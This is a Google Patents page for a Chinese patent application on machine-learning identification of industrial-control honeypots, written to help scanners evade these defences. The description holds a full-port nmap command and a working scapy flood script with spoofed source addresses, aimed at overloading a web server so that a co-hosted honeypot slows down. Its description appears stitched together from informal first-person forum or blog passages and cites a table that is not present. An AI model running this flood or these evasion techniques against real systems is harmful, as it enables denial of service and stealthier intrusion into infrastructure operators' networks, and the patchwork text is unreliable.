CN112261046A - 一种基于机器学习的工控蜜罐识别方法 - Google Patents
一种基于机器学习的工控蜜罐识别方法 Download PDFInfo
- Publication number
- CN112261046A CN112261046A CN202011136925.0A CN202011136925A CN112261046A CN 112261046 A CN112261046 A CN 112261046A CN 202011136925 A CN202011136925 A CN 202011136925A CN 112261046 A CN112261046 A CN 112261046A
- Authority
- CN
- China
- Prior art keywords
- industrial control
- module
- honeypot
- data
- acquired
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1466—Active attacks involving interception, injection, modification, spoofing of data unit addresses, e.g. hijacking, packet injection or TCP sequence number attacks
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06N—COMPUTING ARRANGEMENTS BASED ON SPECIFIC COMPUTATIONAL MODELS
- G06N20/00—Machine learning
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/08—Network architectures or network communication protocols for network security for authentication of entities
- H04L63/0861—Network architectures or network communication protocols for network security for authentication of entities using biometrical features, e.g. fingerprint, retina-scan
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1491—Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L67/00—Network arrangements or protocols for supporting network services or applications
- H04L67/01—Protocols
- H04L67/02—Protocols based on web technology, e.g. hypertext transfer protocol [HTTP]
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- General Engineering & Computer Science (AREA)
- Signal Processing (AREA)
- Computer Networks & Wireless Communication (AREA)
- Computing Systems (AREA)
- Computer Hardware Design (AREA)
- Software Systems (AREA)
- Theoretical Computer Science (AREA)
- Medical Informatics (AREA)
- Artificial Intelligence (AREA)
- Computer Vision & Pattern Recognition (AREA)
- Data Mining & Analysis (AREA)
- Evolutionary Computation (AREA)
- General Health & Medical Sciences (AREA)
- Health & Medical Sciences (AREA)
- Physics & Mathematics (AREA)
- General Physics & Mathematics (AREA)
- Mathematical Physics (AREA)
- Biomedical Technology (AREA)
- Data Exchanges In Wide-Area Networks (AREA)
Abstract
本发明涉及蜜罐识别技术领域,且公开了一种基于机器学习的工控蜜罐识别方法,包括特征数据获取模块,特征数据获取模块输出端电连接有获取数据判断模块,获取数据判断模块输出端短连接有数据包生成模块,数据包生成模块输出端电连接有机器记忆模块,特征数据获取模块S1中获取IP地址信息的方法为通过查询IP地址对应的互联网服务提供商和组织机构信息,该基于机器学习的工控蜜罐识别方法,也能够准确识别中等交互工控蜜罐如Snap7、CryPLH2,还能够识别高交互工控蜜罐如XPOT,针对未知类型的工控蜜罐也能够有效的识别,本发明方法包括对IP地址基础位置信息识别、TCP/IP操作系统指纹识别、工控协议深度交互识别和组态程序调试运行识别。
Description
技术领域
本发明涉及蜜罐识别技术领域,具体为一种基于机器学习的工控蜜罐识别方法。
背景技术
目前,随着工控网与互联网的连接也逐渐暴露了工业控制网的安全隐患,传统的工控网络采用物理隔离的方式来保护其安全性,一旦接入互联网,将面临无法避免的安全威胁,而且工控网由于其大多控制着与人民息息相关的工业、交通、电力、能源的基础设施,与现实世界的联系更加紧密,因此系统的失效有可能会带来灾难性的后果,在进行网络空间探测的过程中,经常会碰到工控蜜罐系统,蜜罐系统是一种设置入侵警报和研究对计算机系统攻击的常用工具,将蜜罐技术应用到工控领域所产生的工控蜜罐系统,对于研究对工控系统的攻击和探测行为具有重要意义,工控蜜罐系统能够收集分析扫描探测引擎的指纹,锁定扫描探测引擎的源IP地址,然后进行封堵,为了发现工控蜜罐,提高扫描探测引擎对抗工控蜜罐的能力,急需一种智能蜜罐识别技术。
发明内容
(一)解决的技术问题
针对现有技术的不足,本发明提供了一种基于机器学习的工控蜜罐识别方法,具备能够使计算机通过学习的方式来识别蜜罐等优点,解决了上述的问题。
(二)技术方案
为实现上述所述目的,本发明提供如下技术方案:一种基于机器学习的工控蜜罐识别方法,包括特征数据获取模块,特征数据获取模块输出端电连接有获取数据判断模块,获取数据判断模块输出端短连接有数据包生成模块,数据包生成模块输出端电连接有机器记忆模块,特征数据获取模块工作步骤为:
S1:IP地址信息识别获取;
S2:工控协议深度交互识别;
S3:TCP/IP操作系统指纹识别。
优选的,所述特征数据获取模块S1中获取IP地址信息的方法为通过查询IP地址对应的互联网服务提供商和组织机构信息,来判断所述IP是否属于云服务器提供商的IP地址,获取数据判断模块则会对获取到的IP地址信息进行判断,当所述IP属于云服务器,并且开放了PLC的工控协议服务,则所述IP为工控蜜罐。
优选的,所述特征数据获取模块S2中工控协议深度交互识别的方法为模拟PLC编程软件与被扫描IP交互,读取完整的配置和状态,获取数据判断模块则会对获取到的IP进行判断,当被扫描IP返回的信息与真实的PLC返回的信息有差异,则被扫描IP为低交互工控蜜罐。
优选的,所述特征数据获取模块S3中TCP/IP操作系统指纹识别的方法为获取目标IP的TCP/IP协议指纹,获取数据判断模块则会对获取到的指纹进行判断,当目标IP的操作系统被识别为Linux非嵌入式工控系统,则所述IP为工控蜜罐。
优选的,所述数据包生成模块能够将获取数据判断模块判断完成后的结果进行数据包生成,从而将数据包发送至系统终端,机器记忆模块则会将数据包生成模块生成的数据包进行接收,然后对其进行记忆,从而让计算机后续能够对碰到的蜜罐进行识别。
(三)有益效果
与现有技术相比,本发明提供了一种基于机器学习的工控蜜罐识别方法,具备以下有益效果:
1、该基于机器学习的工控蜜罐识别方法,能够准确识别低交互工控蜜罐如Conpot,也能够准确识别中等交互工控蜜罐如Snap7、CryPLH2,还能够识别高交互工控蜜罐如XPOT,针对未知类型的工控蜜罐也能够有效的识别,本发明所述方法包括对IP地址基础位置信息识别、TCP/IP操作系统指纹识别、工控协议深度交互识别和组态程序调试运行识别。
2、该基于机器学习的工控蜜罐识别方法,获取数据判断模块能够对特征数据获取模块获取到的数据信息进行逐一判断与合并判断,获取数据判断模块对获取到的数据逐一判断能够对数据进行初步判断,从而识别其是否为低交互蜜罐或中等交互蜜罐,而获取数据判断模块对获取到的数据进行整体判断,则能够通过数据直接的联系来判断其是否为高级蜜罐或未知类型的蜜罐,深度识别其类型,从而方便机器进行方法学习。
3、该基于机器学习的工控蜜罐识别方法,数据包生成模块能够将获取数据判断模块判断完成后的结果进行数据包生成,从而将数据包发送至系统终端,同时在发送完成后使计算机对数据包进行自动拆包,通过机器记忆模块来进行数据记忆和学习,让机器能够在进行每次识别后都能够对数据进行记录,在扩大数据库的同时来进行记忆学习。
附图说明
图1为本发明工作步骤示意图;
图2为本发明系统框架示意图;
图3为本发明特征数据获取模块框架示意图。
具体实施方式
下面将结合本发明实施例中的附图,对本发明实施例中的技术方案进行清楚、完整地描述,显然,所描述的实施例仅仅是本发明一部分实施例,而不是全部的实施例。基于本发明中的实施例,本领域普通技术人员在没有做出创造性劳动前提下所获得的所有其他实施例,都属于本发明保护的范围。
请参阅图1-3,一种基于机器学习的工控蜜罐识别方法,包括特征数据获取模块,特征数据获取模块输出端电连接有获取数据判断模块,获取数据判断模块输出端短连接有数据包生成模块,数据包生成模块输出端电连接有机器记忆模块,特征数据获取模块工作步骤为:
S1:IP地址信息识别获取;
S2:工控协议深度交互识别;
S3:TCP/IP操作系统指纹识别。
所述特征数据获取模块S1中获取IP地址信息的方法为通过查询IP地址对应的互联网服务提供商和组织机构信息,来判断所述IP是否属于云服务器提供商的IP地址,获取数据判断模块则会对获取到的IP地址信息进行判断,当所述IP属于云服务器,并且开放了PLC的工控协议服务,则所述IP为工控蜜罐,所述特征数据获取模块S2中工控协议深度交互识别的方法为模拟PLC编程软件与被扫描IP交互,读取完整的配置和状态,获取数据判断模块则会对获取到的IP进行判断,当被扫描IP返回的信息与真实的PLC返回的信息有差异,则被扫描IP为低交互工控蜜罐,所述特征数据获取模块S3中TCP/IP操作系统指纹识别的方法为获取目标IP的TCP/IP协议指纹,获取数据判断模块则会对获取到的指纹进行判断,当目标IP的操作系统被识别为Linux非嵌入式工控系统,则所述IP为工控蜜罐,所述数据包生成模块能够将获取数据判断模块判断完成后的结果进行数据包生成,从而将数据包发送至系统终端,机器记忆模块则会将数据包生成模块生成的数据包进行接收,然后对其进行记忆,从而让计算机后续能够对碰到的蜜罐进行识别。
与低交互蜜罐检测最主要的方式是通过网络,这样就意味着低交互蜜罐运行在一个具有正常操作系统的,只要是在操作系统中,不可能把所有的资源都分配给蜜罐,所以如果在蜜罐中执行一个很繁琐很耗资源的操作,这样蜜罐就会和其他服务进程去争抢资源,最直观的感受就是蜜罐的反应速度会慢下来。但是我们通常不具备这个权限来访问这种类型的服务或者是进程,所以我们必须得考虑从网络通信入手,增加蜜罐的操作负载,如果换一个角度想,可不可以让其他的服务去和蜜罐争抢资源,来拖慢蜜罐的反应速度,举个例子比如说如果蜜罐系统和一个web服务器同时运行在一台机器上,我们可以从web服务器入手,去给web服务器发送大量http请求,导致web服务器抢占大量计算机资源用来处理请求。这样就会让蜜罐的反应慢下来。
设计实验,假设我们有两台机器,一台机器是蜜罐服务器(192.168.1.100),另一台机器是入侵者(192.168.1.200),首先我们需要使用nmap去探测蜜罐服务器开了那些服务,使用如下命令:
sudo nmap-sV-p T:1-65535-Pn 192.168.1.100
等待一段时间之后会扫描到结果,假设其开启了Apache2 Server、SSH两个服务,我们可以编写一个简单的程序用来给Apache2 Server发HTTP数据包让其大量处理:
#coding=utf-8
from scapy.all import*
from threading import Thread,activeCount
from random import randint
class Loop(Thread):
def__init__(self,remoteAddr):
Thread.__init__(self)
self.remoteAddr=remoteAddr
def run(self):
ip=str(randint(0,255))+'.'\
+str(randint(0,255))+'.'\
+str(randint(0,255))+'.'\
+str(randint(0,255))
sr1(IP(src=ip,dst=self.remoteAddr)/TCP(dport=80),retry=0,verbose=0,timeout=3)
class Main(Thread):
def__init__(self,remoteAddr):
Thread.__init__(self)
self.remoteAddr=remoteAddr
def run(self):
limit=140
total=0
while True:
if activeCount()<limit:
Loop(remoteAddr=self.remoteAddr).start()
total=total+1
print'HTTP Flood Test:',total
if__name__=='__main__':
remoteAddr=raw_input('IP=')
Main(remoteAddr=remoteAddr).start()
我们利用scapy实现了一个简单的http flood的工具,然后对蜜罐服务器的http服务发动攻击。
python http_flood.py
我们同时再去观察蜜罐的响应速度,如果假设正确,此时蜜罐的响应速度应该会大幅度减慢,如果你使用HoneyD或者是LaBrea创建多个蜜罐来组建蜜网的话,只要增加其中一个蜜罐的负载,就可以影响其他蜜罐的运行速度。
如果我们仅通过查看网络数据包能很容易的推断出一个机器的物理属性,我们就很有可能辨别物理服务器和虚拟蜜罐。事实证明,TCP提供了一些直接反映底层服务器状态的信息。TCP时间戳选项被网络堆栈用于确定重传超时时间。机器中的无历史中安特定频率更新时间戳,我们也知道,所有的物理时钟都有一定时钟偏差,他们或多或少于实际运行时间。
通过打开一个到主机的TCP链接,并记录为每个连接所提供的时间戳,就可以去观察时间偏差。我们的希望是每个物理系统或者是操作系统显示出来不同的偏差。如果说一个服务器上运行了多个蜜罐的话,就容易出现每一个蜜罐出现相同的时间偏差,这样的话蜜罐就完全暴露了。这种基于对硬件检测的思想也可以在一定程度上去实现检测是不是蜜罐。
步骤1、IP地址基础位置信息识别:通过查询IP地址对应的ISP(InternetServiceProvider,互联网服务提供商)和Organization(组织机构)信息,来判断所述IP是否属于云服务器提供商的IP地址。当IP属于云服务器,并且开放了PLC的工控协议服务,则所述IP为工控蜜罐的概率大于90%。用P1表示通过IP地址基础位置信息识别判定所述IP为工控蜜罐的概率,0.9<P1<=1;用W1表示通过IP地址基础位置信息识别判定所述IP为工控蜜罐的权重。
针对IP地址对应的ISP和Organization的信息查询,能够选择如下的IP定位库,
如:百度地图、Google、Rtbasia、ipplus360、GeoIp2、IP2Region的IP地址信息库,通过获取的信息来综合判定IP地址是否属于云服务器提供商。
步骤2、TCP/IP操作系统指纹识别:
通过TCP/IP操作系统指纹识别,获取目标IP的TCP/IP协议栈指纹,当所述目标IP的操作系统被识别为Linux的非嵌入式操作系统,则所述目标IP为工控蜜罐的概率大于70%,用P2表示通过TCP/IP操作系统指纹识别判定所述目标IP为工控蜜罐的概率,0.7<P2<=1;用W2表示通过TCP/IP操作系统指纹识别判定所述目标IP为工控蜜罐的权重。
在TCP/IP操作系统指纹识别过程中能够调用Nmap和Xprobe2的扫描工具;Nmap是一种开源的工业级扫描工具,Xprobe2是一种操作系统扫描工具。Nmap通过向目标IP发送多个UDP(UserDatagramProtocol,用户数据报协议)与TCP(TransmissionControlProtocol,传输控制协议)数据包并分析其响应来进行TCP/IP操作系统指纹识别工作。Xprobe2通过向所述目标IP发送ICMP(InternetControlMessageProtocol,Internet控制报文协议)数据包并分析其响应来进行TCP/IP操作系统指纹识别工作。
步骤3、工控协议深度交互识别:
通过工控协议深度交互,模拟PLC编程软件与被扫描IP交互,读取完整的配置和状态。当被扫描IP返回的信息与真实的PLC返回的信息有差异,则被扫描IP为低交互工控蜜罐的概率大于80%,用P3表示通过工控协议深度交互识别判定被扫描IP为蜜罐的概率,0.8<P3<=1;用W3表示通过工控协议深度交互识别判定被扫描IP为蜜罐的权重。
样例1、以施耐德PLC为例:通过modbus协议深度交互,模拟UnityProXL软件与被扫描IP交互。由于UnityProXL软件使用modbus90功能码进行通信,协议内容无加密、无认证,能够仿真交互。通过modbus90功能码进行身份识别与握手请求,读取CPU模块、内存卡和工程项目信息;通过modbus43功能码读取设备型号、固件版本号的信息;通过modbus协议进行工控蜜罐识别时发送的TCP报文的内容,参考表1,表1中描述了工控蜜罐探测时的部分modbus报文组合,及每种modbus功能码对应的详细报文功能和内容。当被扫描IP返回的信息与真实的PLC返回的信息有差异,则所述被扫描IP为工控蜜罐的概率大于80%。
在Apt时候,触发蜜罐报警的几率太大,除非你准确的有这台机器的权限直连,不需要额外的扫描,不然肯定会触发报警,当然发现跟判断进入蜜罐机有是另外一回事。仅仅根据虚拟机来判断是不是进入蜜罐这个是不成立的说法,如今很多企业都开始使用虚拟化技术了,蜜罐分为高交互跟低交互低交互首先来说下低交互蜜罐把,如dionaea,根据攻击者访问端口来打开本地的端口,比如你使用nmap去扫描的时候,你请求那个端口,就会打开那个端口,这特么的明显就是不合适,高交互难判断,就拿我现在做的来说把,真实的机器,之后用anget记录你的所有行为,给你的web是个正常的系统,不过这个系统有漏洞而已。
以上显示和描述了本发明的基本原理和主要特征和本发明的优点。本行业的技术人员应该了解,本发明不受上述实施例的限制,上述实施例和说明书中描述的只是说明本发明的原理,在不脱离本发明精神和范围的前提下,本发明还会有各种变化和改进,这些变化和改进都落入要求保护的本发明范围内。本发明要求保护范围由所附的权利要求书及其等效物界定。
Claims (6)
1.一种基于机器学习的工控蜜罐识别方法,包括特征数据获取模块,其特征在于:所述特征数据获取模块输出端电连接有获取数据判断模块,获取数据判断模块输出端短连接有数据包生成模块,数据包生成模块输出端电连接有机器记忆模块,特征数据获取模块工作步骤为:
S1:IP地址信息识别获取;
S2:工控协议深度交互识别;
S3:TCP/IP操作系统指纹识别。
2.根据权利要求1所述的一种基于机器学习的工控蜜罐识别方法,其特征在于:所述特征数据获取模块S1中获取IP地址信息的方法为通过查询IP地址对应的互联网服务提供商和组织机构信息,来判断所述IP是否属于云服务器提供商的IP地址,获取数据判断模块则会对获取到的IP地址信息进行判断,当所述IP属于云服务器,并且开放了PLC的工控协议服务,则所述IP为工控蜜罐。
3.根据权利要求2所述的一种基于机器学习的工控蜜罐识别方法,其特征在于:所述特征数据获取模块S2中工控协议深度交互识别的方法为模拟PLC编程软件与被扫描IP交互,读取完整的配置和状态,获取数据判断模块则会对获取到的IP进行判断,当被扫描IP返回的信息与真实的PLC返回的信息有差异,则被扫描IP为低交互工控蜜罐。
4.根据权利要求1所述的一种基于机器学习的工控蜜罐识别方法,其特征在于:所述特征数据获取模块S3中TCP/IP操作系统指纹识别的方法为获取目标IP的TCP/IP协议指纹,获取数据判断模块则会对获取到的指纹进行判断,当目标IP的操作系统被识别为Linux非嵌入式工控系统,则所述IP为工控蜜罐。
5.根据权利要求1所述的一种基于机器学习的工控蜜罐识别方法,其特征在于:所述数据包生成模块能够将获取数据判断模块判断完成后的结果进行数据包生成,从而将数据包发送至系统终端,机器记忆模块则会将数据包生成模块生成的数据包进行接收,然后对其进行记忆,从而让计算机后续能够对碰到的蜜罐进行识别。
6.根据权利要求1所述的一种基于机器学习的工控蜜罐识别方法,其特征在于:所述获取数据判断模块能够将特征数据获取模块中获取的数据进行同步运算判断,从而对多组数据进行同步分析,从而判断其是否为高交互工控蜜罐。
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202011136925.0A CN112261046A (zh) | 2020-10-22 | 2020-10-22 | 一种基于机器学习的工控蜜罐识别方法 |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202011136925.0A CN112261046A (zh) | 2020-10-22 | 2020-10-22 | 一种基于机器学习的工控蜜罐识别方法 |
Publications (1)
Publication Number | Publication Date |
---|---|
CN112261046A true CN112261046A (zh) | 2021-01-22 |
Family
ID=74264617
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN202011136925.0A Pending CN112261046A (zh) | 2020-10-22 | 2020-10-22 | 一种基于机器学习的工控蜜罐识别方法 |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN112261046A (zh) |
Cited By (3)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN112800417A (zh) * | 2021-04-15 | 2021-05-14 | 远江盛邦(北京)网络安全科技股份有限公司 | 基于服务状态机的反馈式蜜罐系统的识别方法及系统 |
CN113347205A (zh) * | 2021-06-30 | 2021-09-03 | 深圳前海微众银行股份有限公司 | 一种检测业务访问请求的方法及装置 |
CN117111489A (zh) * | 2023-08-25 | 2023-11-24 | 哈尔滨工程大学 | 一种plc设备的仿真方法、存储介质和电子设备 |
Citations (6)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN102088379A (zh) * | 2011-01-24 | 2011-06-08 | 国家计算机网络与信息安全管理中心 | 基于沙箱技术的客户端蜜罐网页恶意代码检测方法与装置 |
CN107070929A (zh) * | 2017-04-20 | 2017-08-18 | 中国电子技术标准化研究院 | 一种工控网络蜜罐系统 |
CN107979562A (zh) * | 2016-10-21 | 2018-05-01 | 北京计算机技术及应用研究所 | 一种基于云平台的混合型蜜罐动态部署系统 |
US10050999B1 (en) * | 2015-09-22 | 2018-08-14 | Amazon Technologies, Inc. | Security threat based auto scaling |
CN108600193A (zh) * | 2018-04-03 | 2018-09-28 | 北京威努特技术有限公司 | 一种基于机器学习的工控蜜罐识别方法 |
US20200092165A1 (en) * | 2018-09-14 | 2020-03-19 | Rapid7, Inc. | Honeypot asset cloning |
-
2020
- 2020-10-22 CN CN202011136925.0A patent/CN112261046A/zh active Pending
Patent Citations (6)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN102088379A (zh) * | 2011-01-24 | 2011-06-08 | 国家计算机网络与信息安全管理中心 | 基于沙箱技术的客户端蜜罐网页恶意代码检测方法与装置 |
US10050999B1 (en) * | 2015-09-22 | 2018-08-14 | Amazon Technologies, Inc. | Security threat based auto scaling |
CN107979562A (zh) * | 2016-10-21 | 2018-05-01 | 北京计算机技术及应用研究所 | 一种基于云平台的混合型蜜罐动态部署系统 |
CN107070929A (zh) * | 2017-04-20 | 2017-08-18 | 中国电子技术标准化研究院 | 一种工控网络蜜罐系统 |
CN108600193A (zh) * | 2018-04-03 | 2018-09-28 | 北京威努特技术有限公司 | 一种基于机器学习的工控蜜罐识别方法 |
US20200092165A1 (en) * | 2018-09-14 | 2020-03-19 | Rapid7, Inc. | Honeypot asset cloning |
Cited By (6)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN112800417A (zh) * | 2021-04-15 | 2021-05-14 | 远江盛邦(北京)网络安全科技股份有限公司 | 基于服务状态机的反馈式蜜罐系统的识别方法及系统 |
CN112800417B (zh) * | 2021-04-15 | 2021-07-06 | 远江盛邦(北京)网络安全科技股份有限公司 | 基于服务状态机的反馈式蜜罐系统的识别方法及系统 |
CN113347205A (zh) * | 2021-06-30 | 2021-09-03 | 深圳前海微众银行股份有限公司 | 一种检测业务访问请求的方法及装置 |
CN113347205B (zh) * | 2021-06-30 | 2022-10-28 | 深圳前海微众银行股份有限公司 | 一种检测业务访问请求的方法及装置 |
CN117111489A (zh) * | 2023-08-25 | 2023-11-24 | 哈尔滨工程大学 | 一种plc设备的仿真方法、存储介质和电子设备 |
CN117111489B (zh) * | 2023-08-25 | 2024-05-17 | 哈尔滨工程大学 | 一种plc设备的仿真方法、存储介质和电子设备 |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
CN112261046A (zh) | 一种基于机器学习的工控蜜罐识别方法 | |
US10791131B2 (en) | Processing network data using a graph data structure | |
US10721245B2 (en) | Method and device for automatically verifying security event | |
CN107360145B (zh) | 一种多节点蜜罐系统及其数据分析方法 | |
US11647037B2 (en) | Penetration tests of systems under test | |
CN108600193B (zh) | 一种基于机器学习的工控蜜罐识别方法 | |
Torabi et al. | Inferring and investigating IoT-generated scanning campaigns targeting a large network telescope | |
CN108183916A (zh) | 一种基于日志分析的网络攻击检测方法及装置 | |
CN114679292B (zh) | 基于网络空间测绘的蜜罐识别方法、装置、设备及介质 | |
CN110351237B (zh) | 用于数控机床的蜜罐方法及装置 | |
CN111225002A (zh) | 一种网络攻击溯源方法、装置、电子设备和存储介质 | |
CN111464526A (zh) | 一种网络入侵检测方法、装置、设备及可读存储介质 | |
CN110784486A (zh) | 一种工业漏洞扫描方法和系统 | |
Prigent et al. | IpMorph: fingerprinting spoofing unification | |
US10701087B2 (en) | Analysis apparatus, analysis method, and analysis program | |
Sato et al. | An improved intrusion detection method based on process profiling | |
CN114363053A (zh) | 一种攻击识别方法、装置及相关设备 | |
Zamiri-Gourabi et al. | Gas what? i can see your gaspots. studying the fingerprintability of ics honeypots in the wild | |
Song et al. | Rule-based verification of network protocol implementations using symbolic execution | |
CN111177722A (zh) | webshell文件检测方法、装置、服务器以及存储介质 | |
CN112800408B (zh) | 一种基于主动探测的工控设备指纹提取与识别方法 | |
CN109474567B (zh) | Ddos攻击溯源方法、装置、存储介质及电子设备 | |
WO2024113953A1 (zh) | C2服务器识别方法、装置、电子设备及可读存储介质 | |
CN115643044A (zh) | 数据处理方法、装置、服务器及存储介质 | |
Qasim et al. | Pree: Heuristic builder for reverse engineering of network protocols in industrial control systems |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
SE01 | Entry into force of request for substantive examination | ||
RJ01 | Rejection of invention patent application after publication | ||
RJ01 | Rejection of invention patent application after publication |
Application publication date: 20210122 |